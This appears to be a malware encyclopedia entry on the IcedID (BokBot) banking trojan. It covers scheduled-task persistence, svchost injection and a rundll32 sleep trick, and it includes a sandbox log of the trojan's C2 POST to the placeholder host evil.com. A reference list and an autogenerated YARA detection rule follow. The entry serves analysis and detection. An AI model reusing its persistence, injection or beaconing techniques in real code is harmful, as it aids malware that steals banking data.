win.icedid (Back to overview)

IcedID

aka: BokBot, IceID

Actor(s): Lunar Spider

URLhaus        

Analysis Observations:

* It sets up persistence by creating a Scheduled Task with the following characteristics:
* Name: Update
* Trigger: At Log on
* Action: %LocalAppData%\$Example\\waroupada.exe /i
* Conditions: Stop if the computer ceases to be idle.
* The sub-directory within %LocalAppdata%, Appears to be randomly picked from the list of directories within %ProgramFiles%. This needs more verification.
* The filename remained static during analysis.
* The original malware exe (ex. waroupada.exe) will spawn an instance of svchost.exe as a sub-process and then inject/execute its malicious code within it
* If “/i” is not passed as an argument, it sets up persistence and waits for reboot.
* If “/I” is passed as an argument (as is the case when the scheduled task is triggered at login), it skips persistence setup and actually executes; resulting in C2 communication.
* Employs an interesting method for sleeping by calling the Sleep function of kernel32.dll from the shell, like so:
rundll32.exe kernel32,Sleep -s
* Setup a local listener to proxy traffic on 127.0.0.1:50000

**[Example Log from C2 Network Communication]**
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] connect
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: POST /forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11 HTTP/1.1
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Connection: close
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Type: application/x-www-form-urlencoded
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Content-Length: 196
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: Host: evil.com
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] recv: <(POSTDATA)>
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: POST data stored to: /var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: **Request URL: hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11**
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending fake file configured for extension 'php'.
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: HTTP/1.1 200 OK
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Type: text/html
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Server: INetSim HTTPs Server
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Date: Mon, 19 Mar 2018 16:45:55 GMT
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Connection: Close
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] send: Content-Length: 258
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] info: Sending file: /var/lib/inetsim/http/fakefiles/sample.html
[2018-03-19 12:45:55] [42078] [https_443_tcp 44785] [172.16.0.130:54803] stat: 1 **method=POST url=hxxps://evil.com/forum/posting.php?a=0&b=4FC0302F4C59D8CDB8&d=0&e=63&f=0&g=0&h=0&r=0&i=266390&j=11** sent=/var/lib/inetsim/http/fakefiles/sample.html postdata=/var/lib/inetsim/http/postdata/a90b931cb23df85aa6e3f0039958b031c3b053a2

References
2019-12-18 ⋅ Github (psrok1)Paweł Srokosz
@online{srokosz:20191218:icedid:05c3255, author = {Paweł Srokosz}, title = {{IcedID PNG Extractor}}, date = {2019-12-18}, organization = {Github (psrok1)}, url = {https://gist.github.com/psrok1/e6bf5851d674edda03a201e7f24a5e6b}, language = {English}, urldate = {2020-01-13} } IcedID PNG Extractor
IcedID
2019-12-03 ⋅ MalwarebytesThreat Intelligence Team
@online{team:20191203:new:39b59e1, author = {Threat Intelligence Team}, title = {{New version of IcedID Trojan uses steganographic payloads}}, date = {2019-12-03}, organization = {Malwarebytes}, url = {https://blog.malwarebytes.com/threat-analysis/2019/12/new-version-of-icedid-trojan-uses-steganographic-payloads/}, language = {English}, urldate = {2019-12-24} } New version of IcedID Trojan uses steganographic payloads
IcedID
2019-07-09 ⋅ FortinetKai Lu
@online{lu:20190709:deep:90d708f, author = {Kai Lu}, title = {{A Deep Dive Into IcedID Malware: Part I - Unpacking, Hooking and Process Injection}}, date = {2019-07-09}, organization = {Fortinet}, url = {https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-one.html}, language = {English}, urldate = {2020-01-08} } A Deep Dive Into IcedID Malware: Part I - Unpacking, Hooking and Process Injection
IcedID
2019-06-25 ⋅ Dawid Golak
@online{golak:20190625:icedid:0a3e153, author = {Dawid Golak}, title = {{IcedID aka #Bokbot Analysis with Ghidra}}, date = {2019-06-25}, url = {https://medium.com/@dawid.golak/icedid-aka-bokbot-analysis-with-ghidra-560e3eccb766}, language = {English}, urldate = {2019-12-02} } IcedID aka #Bokbot Analysis with Ghidra
IcedID
2019-06-16 ⋅ FortinetKai Lu
@online{lu:20190616:deep:ba89738, author = {Kai Lu}, title = {{A Deep Dive Into IcedID Malware: Part II - Analysis of the Core IcedID Payload (Parent Process)}}, date = {2019-06-16}, organization = {Fortinet}, url = {https://www.fortinet.com/blog/threat-research/icedid-malware-analysis-part-two.html}, language = {English}, urldate = {2019-11-27} } A Deep Dive Into IcedID Malware: Part II - Analysis of the Core IcedID Payload (Parent Process)
IcedID
2019-04-04 ⋅ SecurityIntelligenceNir Somech, Limor Kessem
@online{somech:20190404:icedid:54ba40f, author = {Nir Somech and Limor Kessem}, title = {{IcedID Banking Trojan Spruces Up Injection Tactics to Add Stealth}}, date = {2019-04-04}, organization = {SecurityIntelligence}, url = {https://securityintelligence.com/icedid-banking-trojan-spruces-up-injection-tactics-to-add-stealth/}, language = {English}, urldate = {2020-01-08} } IcedID Banking Trojan Spruces Up Injection Tactics to Add Stealth
IcedID
2019-03-21 ⋅ CrowdStrikeShaun Hurley, James Scalise
@online{hurley:20190321:interception:7e57329, author = {Shaun Hurley and James Scalise}, title = {{Interception: Dissecting BokBot’s “Man in the Browser”}}, date = {2019-03-21}, organization = {CrowdStrike}, url = {https://www.crowdstrike.com/blog/bokbots-man-in-the-browser-overview/}, language = {English}, urldate = {2019-12-20} } Interception: Dissecting BokBot’s “Man in the Browser”
IcedID
2019-02-15 ⋅ CrowdStrikeBrendon Feeley, Bex Hartley
@online{feeley:20190215:sinful:729f693, author = {Brendon Feeley and Bex Hartley}, title = {{“Sin”-ful SPIDERS: WIZARD SPIDER and LUNAR SPIDER Sharing the Same Web}}, date = {2019-02-15}, organization = {CrowdStrike}, url = {https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/}, language = {English}, urldate = {2019-12-20} } “Sin”-ful SPIDERS: WIZARD SPIDER and LUNAR SPIDER Sharing the Same Web
Dyre IcedID TrickBot Vawtrak Lunar Spider WIZARD SPIDER
2019-02-06 ⋅ SecurityIntelligenceItzik Chimino, Limor Kessem, Ophir Harpaz
@online{chimino:20190206:icedid:ef0caad, author = {Itzik Chimino and Limor Kessem and Ophir Harpaz}, title = {{IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites}}, date = {2019-02-06}, organization = {SecurityIntelligence}, url = {https://securityintelligence.com/icedid-operators-using-atsengine-injection-panel-to-hit-e-commerce-sites/}, language = {English}, urldate = {2020-01-08} } IcedID Operators Using ATSEngine Injection Panel to Hit E-Commerce Sites
IcedID
2019-01-03 ⋅ CrowdStrikeShaun Hurley, James Scalise
@online{hurley:20190103:digging:5219f6d, author = {Shaun Hurley and James Scalise}, title = {{Digging into BokBot’s Core Module}}, date = {2019-01-03}, organization = {CrowdStrike}, url = {https://www.crowdstrike.com/blog/digging-into-bokbots-core-module/}, language = {English}, urldate = {2019-12-20} } Digging into BokBot’s Core Module
IcedID
2018-11-09 ⋅ Youtube (OALabs)Sean Wilson, Sergei Frankoff
@online{wilson:20181109:reverse:7e90205, author = {Sean Wilson and Sergei Frankoff}, title = {{Reverse Engineering IcedID / Bokbot Malware Part 2}}, date = {2018-11-09}, organization = {Youtube (OALabs)}, url = {https://www.youtube.com/watch?v=7Dk7NkIbVqY}, language = {English}, urldate = {2019-07-09} } Reverse Engineering IcedID / Bokbot Malware Part 2
IcedID
2018-10-26 ⋅ Youtube (OALabs)Sergei Frankoff
@online{frankoff:20181026:unpacking:b6155cc, author = {Sergei Frankoff}, title = {{Unpacking Bokbot / IcedID Malware - Part 1}}, date = {2018-10-26}, organization = {Youtube (OALabs)}, url = {https://www.youtube.com/watch?v=wObF9n2UIAM}, language = {English}, urldate = {2020-01-08} } Unpacking Bokbot / IcedID Malware - Part 1
IcedID
2018-09-07 ⋅ Vitali Kremez
@online{kremez:20180907:lets:8515a2b, author = {Vitali Kremez}, title = {{Let's Learn: Deeper Dive into "IcedID"/"BokBot" Banking Malware: Part 1}}, date = {2018-09-07}, url = {https://www.vkremez.com/2018/09/lets-learn-deeper-dive-into.html}, language = {English}, urldate = {2020-01-08} } Let's Learn: Deeper Dive into "IcedID"/"BokBot" Banking Malware: Part 1
IcedID
2018-08-09 ⋅ Fox-ITAlfred Klason
@online{klason:20180809:bokbot:499f316, author = {Alfred Klason}, title = {{Bokbot: The (re)birth of a banker}}, date = {2018-08-09}, organization = {Fox-IT}, url = {https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/}, language = {English}, urldate = {2019-12-20} } Bokbot: The (re)birth of a banker
IcedID Vawtrak
2018-04-10 ⋅ Cisco TalosRoss Gibb, Daphne Galme, Michael Gorelik
@online{gibb:20180410:icedid:f1a3ff2, author = {Ross Gibb and Daphne Galme and Michael Gorelik}, title = {{IcedID Banking Trojan Teams up with Ursnif/Dreambot for Distribution}}, date = {2018-04-10}, organization = {Cisco Talos}, url = {https://blog.talosintelligence.com/2018/04/icedid-banking-trojan.html}, language = {English}, urldate = {2019-12-17} } IcedID Banking Trojan Teams up with Ursnif/Dreambot for Distribution
IcedID
2017-11-14 ⋅ Digital GuardianChris Brook
@online{brook:20171114:iceid:5a074d2, author = {Chris Brook}, title = {{IceID Banking Trojan Targeting Banks, Payment Card Providers, E-Commerce Sites}}, date = {2017-11-14}, organization = {Digital Guardian}, url = {https://digitalguardian.com/blog/iceid-banking-trojan-targeting-banks-payment-card-providers-e-commerce-sites}, language = {English}, urldate = {2019-07-10} } IceID Banking Trojan Targeting Banks, Payment Card Providers, E-Commerce Sites
IcedID
2017-11-13 ⋅ SecurityIntelligenceLimor Kessem, Maor Wiesen, Tal Darsan, Tomer Agayev
@online{kessem:20171113:new:bb937fd, author = {Limor Kessem and Maor Wiesen and Tal Darsan and Tomer Agayev}, title = {{New Banking Trojan IcedID Discovered by IBM X-Force Research}}, date = {2017-11-13}, organization = {SecurityIntelligence}, url = {https://securityintelligence.com/new-banking-trojan-icedid-discovered-by-ibm-x-force-research/}, language = {English}, urldate = {2019-11-27} } New Banking Trojan IcedID Discovered by IBM X-Force Research
IcedID IcedID Downloader
2017-11-13 ⋅ IntezerJay Rosenberg
@online{rosenberg:20171113:icedid:8dd9da4, author = {Jay Rosenberg}, title = {{IcedID Banking Trojan Shares Code with Pony 2.0 Trojan}}, date = {2017-11-13}, organization = {Intezer}, url = {http://www.intezer.com/icedid-banking-trojan-shares-code-pony-2-0-trojan/}, language = {English}, urldate = {2019-12-02} } IcedID Banking Trojan Shares Code with Pony 2.0 Trojan
IcedID IcedID Downloader
Yara Rules
[TLP:WHITE] win_icedid_auto (20190204 | autogenerated rule brought to you by yara-signator)
rule win_icedid_auto {

    meta:
        author = "Felix Bilstein - yara-signator at cocacoding dot com"
        date = "2019-11-26"
        version = "1"
        description = "autogenerated rule brought to you by yara-signator"
        tool = "yara-signator 0.1a"
        malpedia_reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid"
        malpedia_version = "20190204"
        malpedia_license = "CC BY-NC-SA 4.0"
        malpedia_sharing = "TLP:WHITE"

    /* DISCLAIMER
     * The strings used in this rule have been automatically selected from the
     * disassembly of memory dumps and unpacked files, using yara-signator.
     * The code and documentation / approach will be published in the near future here:
     * https://github.com/fxb-cocacoding/yara-signator
     * As Malpedia is used as data source, please note that for a given
     * number of families, only single samples are documented.
     * This likely impacts the degree of generalization these rules will offer.
     * Take the described generation method also into consideration when you
     * apply the rules in your use cases and assign them confidence levels.
     */

    strings:
        $sequence_0 = { d1c8 f7d0 d1c8 2d20010000 d1c0 f7d0 }
            // n = 6, score = 1200
            //   d1c8                 | ror                 eax, 1
            //   f7d0                 | not                 eax
            //   d1c8                 | ror                 eax, 1
            //   2d20010000           | sub                 eax, 0x120
            //   d1c0                 | rol                 eax, 1
            //   f7d0                 | not                 eax

        $sequence_1 = { 57 6a00 ff15???????? 50 ff15???????? 8bc6 eb02 }
            // n = 7, score = 1100
            //   57                   | push                edi
            //   6a00                 | push                0
            //   ff15????????         |                     
            //   50                   | push                eax
            //   ff15????????         |                     
            //   8bc6                 | mov                 eax, esi
            //   eb02                 | jmp                 4

        $sequence_2 = { 8b457c 83e800 7439 83e801 741f }
            // n = 5, score = 1100
            //   8b457c               | mov                 eax, dword ptr [ebp + 0x7c]
            //   83e800               | sub                 eax, 0
            //   7439                 | je                  0x3b
            //   83e801               | sub                 eax, 1
            //   741f                 | je                  0x21

        $sequence_3 = { 50 ff15???????? eb0f 6a08 ff15???????? 50 }
            // n = 6, score = 1100
            //   50                   | push                eax
            //   ff15????????         |                     
            //   eb0f                 | jmp                 0x11
            //   6a08                 | push                8
            //   ff15????????         |                     
            //   50                   | push                eax

        $sequence_4 = { 8bf8 85ff 7418 c60700 47 57 }
            // n = 6, score = 1100
            //   8bf8                 | mov                 edi, eax
            //   85ff                 | test                edi, edi
            //   7418                 | je                  0x1a
            //   c60700               | mov                 byte ptr [edi], 0
            //   47                   | inc                 edi
            //   57                   | push                edi

        $sequence_5 = { ff15???????? 85c0 7511 56 57 }
            // n = 5, score = 1100
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   7511                 | jne                 0x13
            //   56                   | push                esi
            //   57                   | push                edi

        $sequence_6 = { 0fb60d???????? 50 0fb605???????? 50 0fb605???????? 50 }
            // n = 6, score = 1100
            //   0fb60d????????       |                     
            //   50                   | push                eax
            //   0fb605????????       |                     
            //   50                   | push                eax
            //   0fb605????????       |                     
            //   50                   | push                eax

        $sequence_7 = { 5d c3 8b542404 33c9 }
            // n = 4, score = 1000
            //   5d                   | pop                 ebp
            //   c3                   | ret                 
            //   8b542404             | mov                 edx, dword ptr [esp + 4]
            //   33c9                 | xor                 ecx, ecx

        $sequence_8 = { c1c90d 0fbec0 03c8 46 }
            // n = 4, score = 1000
            //   c1c90d               | ror                 ecx, 0xd
            //   0fbec0               | movsx               eax, al
            //   03c8                 | add                 ecx, eax
            //   46                   | inc                 esi

        $sequence_9 = { f7d8 1bc0 f7d0 2345fc 8be5 5d c3 }
            // n = 7, score = 1000
            //   f7d8                 | neg                 eax
            //   1bc0                 | sbb                 eax, eax
            //   f7d0                 | not                 eax
            //   2345fc               | and                 eax, dword ptr [ebp - 4]
            //   8be5                 | mov                 esp, ebp
            //   5d                   | pop                 ebp
            //   c3                   | ret                 

        $sequence_10 = { 59 59 c3 33c0 ebf5 55 }
            // n = 6, score = 900
            //   59                   | pop                 ecx
            //   59                   | pop                 ecx
            //   c3                   | ret                 
            //   33c0                 | xor                 eax, eax
            //   ebf5                 | jmp                 0xfffffff7
            //   55                   | push                ebp

        $sequence_11 = { 8bf0 8d45fc 50 ff75fc 6a05 }
            // n = 5, score = 900
            //   8bf0                 | mov                 esi, eax
            //   8d45fc               | lea                 eax, [ebp - 4]
            //   50                   | push                eax
            //   ff75fc               | push                dword ptr [ebp - 4]
            //   6a05                 | push                5

        $sequence_12 = { 8d5004 89542414 8b12 85d2 7454 8d6af8 d1ed }
            // n = 7, score = 700
            //   8d5004               | lea                 edx, [eax + 4]
            //   89542414             | mov                 dword ptr [esp + 0x14], edx
            //   8b12                 | mov                 edx, dword ptr [edx]
            //   85d2                 | test                edx, edx
            //   7454                 | je                  0x56
            //   8d6af8               | lea                 ebp, [edx - 8]
            //   d1ed                 | shr                 ebp, 1

        $sequence_13 = { 0fb6440b34 50 ff740b28 8b440b24 }
            // n = 4, score = 700
            //   0fb6440b34           | movzx               eax, byte ptr [ebx + ecx + 0x34]
            //   50                   | push                eax
            //   ff740b28             | push                dword ptr [ebx + ecx + 0x28]
            //   8b440b24             | mov                 eax, dword ptr [ebx + ecx + 0x24]

        $sequence_14 = { 8a4173 a808 75f5 a804 }
            // n = 4, score = 400
            //   8a4173               | mov                 al, byte ptr [ecx + 0x73]
            //   a808                 | test                al, 8
            //   75f5                 | jne                 0xfffffff7
            //   a804                 | test                al, 4

        $sequence_15 = { ff15???????? 85c0 750a b8010000c0 e9???????? }
            // n = 5, score = 400
            //   ff15????????         |                     
            //   85c0                 | test                eax, eax
            //   750a                 | jne                 0xc
            //   b8010000c0           | mov                 eax, 0xc0000001
            //   e9????????           |                     

        $sequence_16 = { ff5010 85c0 7407 33c0 e9???????? }
            // n = 5, score = 400
            //   ff5010               | call                dword ptr [eax + 0x10]
            //   85c0                 | test                eax, eax
            //   7407                 | je                  9
            //   33c0                 | xor                 eax, eax
            //   e9????????           |                     

        $sequence_17 = { 48 8d542420 41 b804010000 33c9 8bde ff15???????? }
            // n = 7, score = 200
            //   48                   | dec                 eax
            //   8d542420             | lea                 edx, [esp + 0x20]
            //   41                   | inc                 ecx
            //   b804010000           | mov                 eax, 0x104
            //   33c9                 | xor                 ecx, ecx
            //   8bde                 | mov                 ebx, esi
            //   ff15????????         |                     

        $sequence_18 = { 57 41 56 48 83ec20 0fb7f1 }
            // n = 6, score = 200
            //   57                   | push                edi
            //   41                   | inc                 ecx
            //   56                   | push                esi
            //   48                   | dec                 eax
            //   83ec20               | sub                 esp, 0x20
            //   0fb7f1               | movzx               esi, cx

        $sequence_19 = { 8b4810 4a 8b04c1 44 3b480c 72c1 48 }
            // n = 7, score = 200
            //   8b4810               | mov                 ecx, dword ptr [eax + 0x10]
            //   4a                   | dec                 edx
            //   8b04c1               | mov                 eax, dword ptr [ecx + eax*8]
            //   44                   | inc                 esp
            //   3b480c               | cmp                 ecx, dword ptr [eax + 0xc]
            //   72c1                 | jb                  0xffffffc3
            //   48                   | dec                 eax

        $sequence_20 = { 0fb65309 48 035301 48 89573a 48 8d542430 }
            // n = 7, score = 200
            //   0fb65309             | movzx               edx, byte ptr [ebx + 9]
            //   48                   | dec                 eax
            //   035301               | add                 edx, dword ptr [ebx + 1]
            //   48                   | dec                 eax
            //   89573a               | mov                 dword ptr [edi + 0x3a], edx
            //   48                   | dec                 eax
            //   8d542430             | lea                 edx, [esp + 0x30]

        $sequence_21 = { 48 8d510a 48 8b4c0b01 48 }
            // n = 5, score = 200
            //   48                   | dec                 eax
            //   8d510a               | lea                 edx, [ecx + 0xa]
            //   48                   | dec                 eax
            //   8b4c0b01             | mov                 ecx, dword ptr [ebx + ecx + 1]
            //   48                   | dec                 eax

    condition:
        7 of them
}
Download all Yara Rules